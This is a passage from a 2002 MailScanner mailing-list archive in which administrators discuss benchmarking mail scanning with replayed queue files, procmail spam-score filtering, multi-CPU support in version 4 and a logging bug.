LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER ianz@QUARTERLEAF.COM Ian Zapczynski The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+ianz%40QUARTERLEAF.COM+Ian+Zapczynski&L=MAILSCANNER This first link will add the subscriber to the list. You can then set the subscription options with this link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=SET+MAILSCANNER+HTML+DIGEST+FOR+ianz%40QUARTERLEAF.COM&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From thomas_duvally at BROWN.EDU Tue Sep 17 21:35:13 2002 From: thomas_duvally at BROWN.EDU (Thomas DuVally) Date: Thu Jan 12 21:15:41 2006 Subject: Benchmarking Message-ID: <1032294913.1637.8.camel@toms> Hi all, Anyone know of a good way to benchmark a mailserver? We are getting ready to implement Sendmail/Mailscanner/SpamAssassin and would like to have some numbers that tell us how it's goind to perform before we put it in. We think we know how we can load test it: Make it a relay just for the ORBS and MAPS domains and submit it for testing. Once it gets posted we can watch the spam start flying. But we want something a little more controlled. Any ideas/known apps? -- Tom DuVally Lead Sys. Programmer CIS, Brown University p 401-863-9466 From jim at ENTROPHY-FREE.NET Tue Sep 17 22:09:50 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:41 2006 Subject: Benchmarking In-Reply-To: <1032294913.1637.8.camel@toms> References: <1032294913.1637.8.camel@toms> Message-ID: <1032296991.1839.51.camel@wilowisp.dynetics.com> On Tue, 2002-09-17 at 15:35, Thomas DuVally wrote: > Hi all, > Anyone know of a good way to benchmark a mailserver? We are getting > ready to implement Sendmail/Mailscanner/SpamAssassin and would like to > have some numbers that tell us how it's goind to perform before we put > it in. > We think we know how we can load test it: Make it a relay just for the > ORBS and MAPS domains and submit it for testing. Once it gets posted we > can watch the spam start flying. But we want something a little more > controlled. > I don't know that I've ever looked for a specific application to do load tests, but I can tell you how I do it. I've got a collection of qf/df pairs that I gathered from traffic through a real server. There's some 15K messages (~350Mb) in my sample and approximately half is spam. I use a perl script to feed the messages into MailScanners Incoming Queue Dir at what ever rate I want. MailScanner does its thing and drops the result into the Outgoing Queue DIR. The queue dirs aren't known to sendmail, so it remains out of the loop and all I see is the performance of MailScanner. I don't see any point in including Sendmail in the test since there are so many unknowns in mail traffic. It's easy enough to watch the load and how many messages are being processed per unit of time when you have control of the message input rate. And by working with a fixed set of messages you have predictable behaviour of MailScanner over the set. With a live mail feed the content and percentage of spam varies greatly. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From mailscanner at ecs.soton.ac.uk Tue Sep 17 22:51:16 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:41 2006 Subject: Multiple cpu? In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB2C@lkl22.ltkalmar.se > Message-ID: <5.1.0.14.2.20020917225053.03ab96a0@imap.ecs.soton.ac.uk> MailScanner V4 will support multi-CPU machines very nicely. At 14:59 17/09/2002, you wrote: >HI >I know I've seen something about the support for more >then one cpu but can't find it. >Since we are migratin from TFS and NT to >sendmail and MS I wonder how the 2 cpu is on MS? >I guess all AV-progs are able to use it but wonder if its worth it >if MS dont? > >Kind regards > >/Anders -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 17 22:57:35 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:41 2006 Subject: Best practices for white and black lists? In-Reply-To: Message-ID: <5.1.0.14.2.20020917225446.03aa9bb0@imap.ecs.soton.ac.uk> Sorry to spout on about the new version of MailScanner again, rather than the version you've got, but this should be simple. You will be able to specify a set of rules for calculating the value "Is It Definitely Spam" (addresses contained in the ruleset build up your blacklist), and a set for calculating the value "Is It Definitely Not Spam" (addresses contained in the ruleset build up your whitelist). Currently there is a "spam.whitelist.conf" in which you can place all your whitelist addresses. There is currently no blacklist, but you can easily do that in sendmail anyway. At 16:15 17/09/2002, you wrote: >I am trying to figure our the best method for creating white and black >lists. It seems like there are several places to put these entries >mailscanner/spamassasin/or sendmail. > >The first scenario is mail that did not get tagged as spam but should have. >Should I put in the ip in the access sendmail file or is ther a black list >for mailscanner? Is there a simpler way? > >The second scenario is something get's reported as spam but should not. Can >I use the auto whitelist feature? If so, how does it work, I couldnt find >any information on configuratio or use? What is the best way? > >There probably is a million ways to cut it, but I am looking for best >practices that seem to work for people. My goal is to limit the amount of >management and using automated features would be great. Thanks. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 17 23:07:52 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:41 2006 Subject: Benchmarking In-Reply-To: <1032296991.1839.51.camel@wilowisp.dynetics.com> References: <1032294913.1637.8.camel@toms> <1032294913.1637.8.camel@toms> Message-ID: <5.1.0.14.2.20020917230202.02313788@imap.ecs.soton.ac.uk> At 22:09 17/09/2002, you wrote: >On Tue, 2002-09-17 at 15:35, Thomas DuVally wrote: > > Hi all, > > Anyone know of a good way to benchmark a mailserver? We are > getting > > ready to implement Sendmail/Mailscanner/SpamAssassin and would like to > > have some numbers that tell us how it's goind to perform before we put > > it in. > > We think we know how we can load test it: Make it a relay just > for the > > ORBS and MAPS domains and submit it for testing. Once it gets posted we > > can watch the spam start flying. But we want something a little more > > controlled. > > >I don't know that I've ever looked for a specific application to do load >tests, but I can tell you how I do it. I've got a collection of qf/df >pairs that I gathered from traffic through a real server. There's some >15K messages (~350Mb) in my sample and approximately half is spam. I use >a perl script to feed the messages into MailScanners Incoming Queue Dir >at what ever rate I want. MailScanner does its thing and drops the >result into the Outgoing Queue DIR. The queue dirs aren't known to >sendmail, so it remains out of the loop and all I see is the performance >of MailScanner. > >I don't see any point in including Sendmail in the test since there are >so many unknowns in mail traffic. It's easy enough to watch the load and >how many messages are being processed per unit of time when you have >control of the message input rate. And by working with a fixed set of >messages you have predictable behaviour of MailScanner over the set. >With a live mail feed the content and percentage of spam varies greatly. Seconded. What I have done is capture (using the Archive Mail feature) 20,000 real messages coming in to our department. I go through all the qf files, and replace the sender and recipients with "anonymous". All our mail servers have an alias called "anonymous" whose value is "/dev/null". This way I'm protected from embarrassment should any of the messages leak out of my test server by mistake. I switch off the incoming and outgoing sendmails, and set the delivery mode in MS to "queue" so it doesn't make any delivery attempts. The only things that should then leak are all the sender reports, and the messages containing disinfected documents (with macro viruses removed). These all end up at /dev/null when they first hit any of my other mail servers. I then plonk 20,000 messages in /var/spool/mqueue.in and time how long it takes for /var/spool/mqueue.in to become empty. Works a treat. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Janssen at RZ.UNI-FRANKFURT.DE Tue Sep 17 23:06:44 2002 From: Janssen at RZ.UNI-FRANKFURT.DE (Michael Janssen) Date: Thu Jan 12 21:15:41 2006 Subject: end user head space In-Reply-To: Message-ID: Hello list, procmail can't do it self. But procmail has an \/-Operator wich generates a $MATCH with everything the rest of the test catches: ### SA-Scoring :0 * ^X-MailScanner-SpamCheck: SpamAssassin .score=\/[^\., ]* * ? test ${MATCH} -ge 15 $MAILDIR/spam/high filling the score (everything after \/ till dot, comma, space) to $MATCH and then process with (bash-builtin) test. "?" let procmail take the return value of the given programm as a test. since "test" doesn't handel floats the regexp has to cut the score to int. Warning: I'm not shure if this repipe is sure. What happens when rbl-checks involved? On our side, we don't do any rbl-dns-checks so i can't say. cheers Michael Computer Centre University of Frankfurt - Germany On Tue, 17 Sep 2002, Eric H wrote: > I forgot, is end user headspace measured in micrometers or Angstroms? > > Anyway, end users need things REALLY simple, like three big dumb buttons > to choose whether they want their spam protection level at LOW, MEDIUM > or HIGH. > > What would be reasonable values to assign? Low>7, med>5, high>4 or > something like that? > > I know this is more of a procmail question but I'm thinking of a rule > something like > > :0H > * ^X-MailScanner-SpamCheck: SpamAssassin (score>4.9 > .spam > > where anything scoring higher than 4.9 would be caught, but I > don't even know if you can do comparative arithmetic in procmail > rules. > > Eric > From email at ace.net.au Wed Sep 18 07:32:39 2002 From: email at ace.net.au (Peter Nitschke) Date: Thu Jan 12 21:15:41 2006 Subject: Virus Test In-Reply-To: <5.1.0.14.2.20020917225446.03aa9bb0@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020917225446.03aa9bb0@imap.ecs.soton.ac.uk> Message-ID: <200209181602390154.13087389@smtp1.ace.net.au> Has anyone had good results trying this? http://www.gfi.com/emailsecuritytest Peter From tlyons at digitalvoodoo.org Wed Sep 18 07:40:33 2002 From: tlyons at digitalvoodoo.org (Tim Lyons) Date: Thu Jan 12 21:15:41 2006 Subject: Virus Test In-Reply-To: <200209181602390154.13087389@smtp1.ace.net.au> References: <5.1.0.14.2.20020917225446.03aa9bb0@imap.ecs.soton.ac.uk> <200209181602390154.13087389@smtp1.ace.net.au> Message-ID: <200209180240.34038.tlyons@digitalvoodoo.org> I tried it and had fairly good results on the automated test. --Tim On Wednesday 18 September 2002 02:32, Peter Nitschke wrote: > Has anyone had good results trying this? > > http://www.gfi.com/emailsecuritytest > > Peter From erich at OLYPEN.COM Wed Sep 18 07:45:13 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:41 2006 Subject: end user head space In-Reply-To: Message-ID: On Wed, 18 Sep 2002, Michael Janssen wrote: > procmail can't do it self. But procmail has an \/-Operator wich generates > a $MATCH with everything the rest of the test catches: > > ### SA-Scoring > :0 > * ^X-MailScanner-SpamCheck: SpamAssassin .score=\/[^\., ]* > * ? test ${MATCH} -ge 15 > $MAILDIR/spam/high > > filling the score (everything after \/ till dot, comma, space) to $MATCH > and then process with (bash-builtin) test. "?" let procmail take the > return value of the given programm as a test. > > since "test" doesn't handel floats the regexp has to cut the score to int. I haven't had a chance to experiment with this yet, but just off the top of my head might it be possible to just remove the decimal point somehow and deal with the larger two digit integer rather than just truncating it? Or would that be unnecessary added value? (nonetheless, it would be a cool thing to know how to do, for us types that are entertained by such things) Eric From andersan at LTKALMAR.SE Wed Sep 18 08:28:58 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:41 2006 Subject: SV: Multiple cpu? Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB2E@lkl22.ltkalmar.se> Thanks, then I order more horse power to the comp and do an upgrade when v.4 is here. /Anders > -----Ursprungligt meddelande----- > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Skickat: den 17 september 2002 23:51 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: Re: Multiple cpu? > > > MailScanner V4 will support multi-CPU machines very nicely. > > At 14:59 17/09/2002, you wrote: > >HI > >I know I've seen something about the support for more > >then one cpu but can't find it. > >Since we are migratin from TFS and NT to > >sendmail and MS I wonder how the 2 cpu is on MS? > >I guess all AV-progs are able to use it but wonder if its worth it > >if MS dont? > > > >Kind regards > > > >/Anders > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From bovati at MONDADORI.COM Wed Sep 18 11:14:09 2002 From: bovati at MONDADORI.COM (Mirko Bovati) Date: Thu Jan 12 21:15:41 2006 Subject: mailscanner die Message-ID: <200209181014.g8IAE9r20462@ori.rl.ac.uk> Dear folks, I am new user of mailscanner, sorry if this question is a FAQ, I looked at the archive of the list without any result for this problem. I use uvscan on a redhat 7.3. it works good till a attach (with a virus) that begin with a space. After 10 or 15 messages received with the same attach like the " corponew.doc" below, the mailscanner process die. read-open corponew.doc: No such file or directory at /usr/lib/perl5/site_perl/5.6.1/MIME/Body.pm line 417 Thanks for any hint. Mirko Bovati From erich at OLYPEN.COM Wed Sep 18 11:35:30 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:41 2006 Subject: SV: Multiple cpu? In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB2E@lkl22.ltkalmar.se> Message-ID: On Wed, 18 Sep 2002, Anders Andersson, IT wrote: > Thanks, then I order more horse power to the comp > and do an upgrade when v.4 is here. I don't recall if version 4 is supposed to be multithreaded or not, but the ability to run multiple instances of mailscanner, or even just two, will be a Very Good Thing. Probably a lot more valuable than multithreadedness. My guess is it's more of an IO and scheduling thing than CPU horsepower. Eric From erich at OLYPEN.COM Wed Sep 18 12:04:02 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:41 2006 Subject: MailScanner and mailing lists Message-ID: What happens when a mailing list of maybe a couple of hundred or even thousands of subscribers goes off, either Majordomo or GNU Mailman? Is that going to pound on the the machine running MailScanner? I imagine that if there were no attachments then the virus scanner wouldn't be a consideration, but what about how it calls SpamAssassin? Would every message be scanned individually? Eric From S.R.Patterson at SOTON.AC.UK Wed Sep 18 12:12:21 2002 From: S.R.Patterson at SOTON.AC.UK (Patterson S.R.) Date: Thu Jan 12 21:15:41 2006 Subject: MailScanner and mailing lists Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 No, it's one message addressed to lots of recipients, not lots of messages addressed to one recipient. - -- Steven Patterson MSci OCP. Tel: +44 (0)2380 595810 Electronic Information Systems Support and Development Information Systems Services, University of Southampton, UK. Public PGP Key: http://www.soton.ac.uk/~srp/pubkey.asc > -----Original Message----- > From: Eric H [mailto:erich@OLYPEN.COM] > Sent: 18 September 2002 12:04 > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: MailScanner and mailing lists > > > What happens when a mailing list of maybe a couple of hundred or even > thousands of subscribers goes off, either Majordomo or GNU Mailman? Is > that going to pound on the the machine running MailScanner? > > I imagine that if there were no attachments then the virus scanner > wouldn't be a consideration, but what about how it calls SpamAssassin? > Would every message be scanned individually? > > Eric > -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPYhfk62fOiTs5+WvEQIyvgCdEEcqpwNaP2tRb+8oy1MiAf4OGH0AnAx6 16IR+0bLeceUC+AK7xJRgcDb =/943 -----END PGP SIGNATURE----- From S.R.Patterson at SOTON.AC.UK Wed Sep 18 12:33:29 2002 From: S.R.Patterson at SOTON.AC.UK (Patterson S.R.) Date: Thu Jan 12 21:15:41 2006 Subject: Little logging bug? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hey, I've noticed that if MailScanner notices something is spam according to MAPS or another DNS lookup system, it also logs that it's spam according to SpamAssassin - even if it's not. E.g: Sep 18 10:37:54 mta1 mailscanner[6948]: Message g8I9bnBd012353 from 213.121.88.122 (gpmuk.com) is spam according to MAPS-RBL+, SpamAssassin (score=-2.9, required 5, IN_REP_TO, TO_LOCALPART_EQ_REAL) Sep 18 11:53:28 mta1 mailscanner[6948]: Message g8IArQBd030241 from 213.121.105.45 (gristpersonnel.co.uk) is spam according to MAPS-RBL+, SpamAssassin (score=-4.8, required 5, SUBJ_HAS_Q_MARK, DEAR_SOMEBODY, OUTLOOK_FWD, PORN_14) Sep 18 11:29:42 mta1 mailscanner[6948]: Message g8IATcBd024884 from 202.109.194.145 (gestguardiola.es) is spam according to MAPS-RBL+, SpamAssassin (score=4.1, required 5, NO_REAL_NAME, FROM_ENDS_IN_NUMS, CLICK_BELOW, CTYPE_JUST_HTML) Cheers, Steve - -- Steven Patterson MSci OCP. Tel: +44 (0)2380 595810 Electronic Information Systems Support and Development Information Systems Services, University of Southampton, UK. Public PGP Key: http://www.soton.ac.uk/~srp/pubkey.asc -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPYhkiK2fOiTs5+WvEQJnfACfQpRTVP00OUAhtzVXx4fcMGH9nFwAn33x GgTDSLiyiD6Z5fLout5mlZp4 =Hn8J -----END PGP SIGNATURE----- From mailscanner at ecs.soton.ac.uk Wed Sep 18 12:43:53 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:41 2006 Subject: SV: Multiple cpu? In-Reply-To: References: <7B475DC5E9502B4D91EA73C283AE48D70263EB2E@lkl22.ltkalmar.se> Message-ID: <5.1.0.14.2.20020918124327.03a13af0@imap.ecs.soton.ac.uk> At 11:35 18/09/2002, you wrote: >On Wed, 18 Sep 2002, Anders Andersson, IT wrote: > > > Thanks, then I order more horse power to the comp > > and do an upgrade when v.4 is here. > >I don't recall if version 4 is supposed to be multithreaded or not, but >the ability to run multiple instances of mailscanner, or even just two, >will be a Very Good Thing. Probably a lot more valuable than >multithreadedness. My guess is it's more of an IO and scheduling thing >than CPU horsepower. It's not strictly multi-threaded but it is multi-process. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From andersan at LTKALMAR.SE Wed Sep 18 13:00:59 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:41 2006 Subject: SV: SV: Multiple cpu? Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB32@lkl22.ltkalmar.se> Just so Im sure of what you mean. I wont run multiple instances on the mailserver, I just want to be able to use the extra process speed from 2 cpu's? /Anders > -----Ursprungligt meddelande----- > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Skickat: den 18 september 2002 13:44 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: Re: SV: Multiple cpu? > > > At 11:35 18/09/2002, you wrote: > >On Wed, 18 Sep 2002, Anders Andersson, IT wrote: > > > > > Thanks, then I order more horse power to the comp > > > and do an upgrade when v.4 is here. > > > >I don't recall if version 4 is supposed to be multithreaded > or not, but > >the ability to run multiple instances of mailscanner, or > even just two, > >will be a Very Good Thing. Probably a lot more valuable than > >multithreadedness. My guess is it's more of an IO and > scheduling thing > >than CPU horsepower. > > It's not strictly multi-threaded but it is multi-process. > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From dml at UNB.CA Wed Sep 18 12:59:40 2002 From: dml at UNB.CA (David Lancaster) Date: Thu Jan 12 21:15:41 2006 Subject: end user head space In-Reply-To: <1032292046.1839.31.camel@wilowisp.dynetics.com> Message-ID: > Comparative arithmetic in a number of filters is difficult, if not > impossible. I use a modified V3 scanner that changes the SpamAssassin > header in the message to look like: > > X-Mailscanner-SpamCheck: (#####) score=5.1... > > I round the score and let the #'s indicate the result. That makes > filters easy, in pseudo code: > > if SpamCheck header contains "(####" then discard > > And to make it easy for users I've written an simple php interface for > Cyrus Sieve that lets the user simply select their "spam tolerance", > user whitelist and forwarding. It probably wouldn't be very difficult to > modify it to generate procmail filters. > > Per Julian, this capability will be in the upcoming V4 release, but I'd > be glad to share my modifications if you want them. Not sure on the ETA for V4, but I know that this is probably one of the most requested features of our (in-progress) implementation. I'd be interested in looking at the patch. Julian, do you consider V3 frozen, or is there a possibility of getting this added? D. =========================================================== David Lancaster ITS ESS 447-3212 From mailscanner at ecs.soton.ac.uk Wed Sep 18 14:33:19 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:41 2006 Subject: SV: SV: Multiple cpu? In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB32@lkl22.ltkalmar.se > Message-ID: <5.1.0.14.2.20020918143221.054acb30@imap.ecs.soton.ac.uk> At 13:00 18/09/2002, you wrote: >Just so Im sure of what you mean. >I wont run multiple instances on the mailserver, I >just want to be able to use the extra process speed from 2 cpu's? You can just set the number of child processes you want to run. This will then use all the CPU's it can get. My first speed test was done with 12 child processes on a 2 CPU system. >/Anders > > > -----Ursprungligt meddelande----- > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > Skickat: den 18 september 2002 13:44 > > Till: MAILSCANNER@JISCMAIL.AC.UK > > ?mne: Re: SV: Multiple cpu? > > > > > > At 11:35 18/09/2002, you wrote: > > >On Wed, 18 Sep 2002, Anders Andersson, IT wrote: > > > > > > > Thanks, then I order more horse power to the comp > > > > and do an upgrade when v.4 is here. > > > > > >I don't recall if version 4 is supposed to be multithreaded > > or not, but > > >the ability to run multiple instances of mailscanner, or > > even just two, > > >will be a Very Good Thing. Probably a lot more valuable than > > >multithreadedness. My guess is it's more of an IO and > > scheduling thing > > >than CPU horsepower. > > > > It's not strictly multi-threaded but it is multi-process. > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From andersan at LTKALMAR.SE Wed Sep 18 14:48:42 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:41 2006 Subject: SV: SV: SV: Multiple cpu? Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB37@lkl22.ltkalmar.se> Hmm, now I feel stupid but I have to ask. Whats the differense between instances and child processes? You all probably figured out my level of expertice =( but this is something I relly need to understand. My guess from the begining was thats with 2 cpu MS would be able to scan faster. But know Im not sure If I should spend the extra money. Does 2 cpu demands extra config or will it handle it by it self? Kind regards /Anders > -----Ursprungligt meddelande----- > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Skickat: den 18 september 2002 15:33 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: Re: SV: SV: Multiple cpu? > > > At 13:00 18/09/2002, you wrote: > >Just so Im sure of what you mean. > >I wont run multiple instances on the mailserver, I > >just want to be able to use the extra process speed from 2 cpu's? > > You can just set the number of child processes you want to > run. This will > then use all the CPU's it can get. My first speed test was > done with 12 > child processes on a 2 CPU system. > > > >/Anders > > > > > -----Ursprungligt meddelande----- > > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > > Skickat: den 18 september 2002 13:44 > > > Till: MAILSCANNER@JISCMAIL.AC.UK > > > ?mne: Re: SV: Multiple cpu? > > > > > > > > > At 11:35 18/09/2002, you wrote: > > > >On Wed, 18 Sep 2002, Anders Andersson, IT wrote: > > > > > > > > > Thanks, then I order more horse power to the comp > > > > > and do an upgrade when v.4 is here. > > > > > > > >I don't recall if version 4 is supposed to be multithreaded > > > or not, but > > > >the ability to run multiple instances of mailscanner, or > > > even just two, > > > >will be a Very Good Thing. Probably a lot more valuable than > > > >multithreadedness. My guess is it's more of an IO and > > > scheduling thing > > > >than CPU horsepower. > > > > > > It's not strictly multi-threaded but it is multi-process. > > > -- > > > Julian Field Teaching Systems Manager > > > jkf@ecs.soton.ac.uk Dept. of Electronics & > Computer Science > > > Tel. 023 8059 2817 University of Southampton > > > Southampton SO17 1BJ > > > > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From jim at ENTROPHY-FREE.NET Wed Sep 18 15:11:21 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:41 2006 Subject: SV: SV: SV: Multiple cpu? In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB37@lkl22.ltkalmar.se> References: <7B475DC5E9502B4D91EA73C283AE48D70263EB37@lkl22.ltkalmar.se> Message-ID: <1032358282.7500.31.camel@chaos.entrophy-free.net> On Wed, 2002-09-18 at 08:48, Anders Andersson, IT wrote: > Hmm, now I feel stupid but I have to ask. > Whats the differense between instances and child processes? The difference is effectively just the way the the multiple processes are handled. The current (V3) code wasn't designed for multiple MS processes, so you have to run multiple copies (instances). So I refer to using multiple instances of MS, with the queue's managed by a separate process. Each instance of MS in a multi-process scenario is running continuously. The upcoming V4 code runs a single master process that spawns off children as necessary (up to some configured max number) to handle the load. Child processes do their work and exit so that they don't needless consume resources. At least that's what I assume Julian has done. > You all probably figured out my level of expertice =( > but this is something I relly need to understand. > My guess from the begining was thats with 2 cpu MS would be > able to scan faster. But know Im not sure If I should spend the > extra money. > Does 2 cpu demands extra config or will it handle it by it self? > You won't gain much advantage as far as MS is concerned from a multi-processor box. However, MS isn't the only thing active on a system that also happens to be running MS, so the other processor will get used but things like the sendmail and other tasks the system runs. My personal recommendation is to go with a multi-processor if you have a significant mail load. -- The instructions said to use Windows 98 or better, so I installed RedHat. From LISTSERV at JISCMAIL.AC.UK Wed Sep 18 15:14:12 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:41 2006 Subject: MAILSCANNER: dmc@UKC.AC.UK requested to join Message-ID: <200209181414.PAA20380@magpie.ecs.soton.ac.uk> Wed, 18 Sep 2002 15:14:12 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Darren Chapman . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER dmc@UKC.AC.UK Darren Chapman The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+dmc%40UKC.AC.UK+Darren+Chapman&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Wed Sep 18 15:22:55 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:41 2006 Subject: SV: SV: SV: Multiple cpu? In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB37@lkl22.ltkalmar.se > Message-ID: <5.1.0.14.2.20020918151837.02c67c50@imap.ecs.soton.ac.uk> At 14:48 18/09/2002, you wrote: >Hmm, now I feel stupid but I have to ask. >Whats the differense between instances and child processes? 1 instance = 1 child process in MailScanner v4. >My guess from the begining was thats with 2 cpu MS would be >able to scan faster. But know Im not sure If I should spend the >extra money. Version 4 will definitely scan faster with 2 CPU's than 1. >Does 2 cpu demands extra config or will it handle it by it self? No extra config required. >Kind regards > >/Anders > > > > -----Ursprungligt meddelande----- > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > Skickat: den 18 september 2002 15:33 > > Till: MAILSCANNER@JISCMAIL.AC.UK > > ?mne: Re: SV: SV: Multiple cpu? > > > > > > At 13:00 18/09/2002, you wrote: > > >Just so Im sure of what you mean. > > >I wont run multiple instances on the mailserver, I > > >just want to be able to use the extra process speed from 2 cpu's? > > > > You can just set the number of child processes you want to > > run. This will > > then use all the CPU's it can get. My first speed test was > > done with 12 > > child processes on a 2 CPU system. > > > > > > >/Anders > > > > > > > -----Ursprungligt meddelande----- > > > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > > > Skickat: den 18 september 2002 13:44 > > > > Till: MAILSCANNER@JISCMAIL.AC.UK > > > > ?mne: Re: SV: Multiple cpu? > > > > > > > > > > > > At 11:35 18/09/2002, you wrote: > > > > >On Wed, 18 Sep 2002, Anders Andersson, IT wrote: > > > > > > > > > > > Thanks, then I order more horse power to the comp > > > > > > and do an upgrade when v.4 is here. > > > > > > > > > >I don't recall if version 4 is supposed to be multithreaded > > > > or not, but > > > > >the ability to run multiple instances of mailscanner, or > > > > even just two, > > > > >will be a Very Good Thing. Probably a lot more valuable than > > > > >multithreadedness. My guess is it's more of an IO and > > > > scheduling thing > > > > >than CPU horsepower. > > > > > > > > It's not strictly multi-threaded but it is multi-process. > > > > -- > > > > Julian Field Teaching Systems Manager > > > > jkf@ecs.soton.ac.uk Dept. of Electronics & > > Computer Science > > > > Tel. 023 8059 2817 University of Southampton > > > > Southampton SO17 1BJ > > > > > > > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 18 15:25:33 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: SV: SV: SV: Multiple cpu? In-Reply-To: <1032358282.7500.31.camel@chaos.entrophy-free.net> References: <7B475DC5E9502B4D91EA73C283AE48D70263EB37@lkl22.ltkalmar.se> <7B475DC5E9502B4D91EA73C283AE48D70263EB37@lkl22.ltkalmar.se> Message-ID: <5.1.0.14.2.20020918152359.02d045a8@imap.ecs.soton.ac.uk> At 15:11 18/09/2002, you wrote: >On Wed, 2002-09-18 at 08:48, Anders Andersson, IT wrote: > > Hmm, now I feel stupid but I have to ask. > > Whats the differense between instances and child processes? > >The difference is effectively just the way the the multiple processes >are handled. The current (V3) code wasn't designed for multiple MS >processes, so you have to run multiple copies (instances). So I refer to >using multiple instances of MS, with the queue's managed by a separate >process. Each instance of MS in a multi-process scenario is running >continuously. > >The upcoming V4 code runs a single master process that spawns off >children as necessary (up to some configured max number) to handle the >load. That's all correct and more accurate than my previous posting :-) > Child processes do their work and exit so that they don't needless >consume resources. At least that's what I assume Julian has done. They run for a few 